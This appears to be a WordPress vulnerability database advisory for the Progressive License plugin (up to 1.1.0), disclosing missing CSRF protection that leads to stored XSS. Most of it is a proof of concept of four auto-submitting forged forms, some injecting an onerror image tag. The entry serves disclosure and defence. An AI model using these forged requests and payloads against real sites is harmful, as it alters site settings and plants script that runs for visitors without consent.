WordPress Plugin Vulnerabilities
Progressive License <= 1.1.0 - CSRF to Stored XSS
Description
The plugin is lacking any CSRF check when saving its settings, which could allow attackers to make a logged in admin change them. Furthermore, as the plugin allows arbitrary HTML to be inserted in one of the settings, this could lead to Stored XSS issue which will be triggered in the frontend as well.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
<input type="text" name="acc_data[timeframe_1][duration]" value="0">
<input type="text" name="acc_data[timeframe_1][key]" value="test">
<input type="text" name="acc_data[timeframe_expire][key]" value="none">
<input type="text" name="show_images" value="yes">
<input type="text" name="acc_action" value="update_settings">
<input type="text" name="acc_infinity" value="∞">
<input type="text" name="submit" value="Update License Settings">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script>
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
<input type="text" name="acc_license[name]" value="test">
<input type="text" name="acc_license[url]" value="">
<input type="text" name="acc_license[image]" value="">
<input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
<input type="text" name="acc_action" value="edited">
<input type="text" name="acc_license_key" value="test">
<input type="text" name="submit" value="Save Changes">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script>
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
<input type="text" name="delete_license" value="Delete">
<input type="text" name="acc_license_key" value="test2">
<input type="text" name="acc_action" value="delete">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
<input type="text" name="acc_license[name]" value="bbb">
<input type="text" name="acc_license[url]" value="">
<input type="text" name="acc_license[image]" value="">
<input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
<input type="text" name="acc_action" value="add">
<input type="text" name="submit" value="Submit New License">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script> Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-07-07 (about 2 months ago)
Added
2022-07-07 (about 2 months ago)
Last Updated
2022-07-07 (about 2 months ago)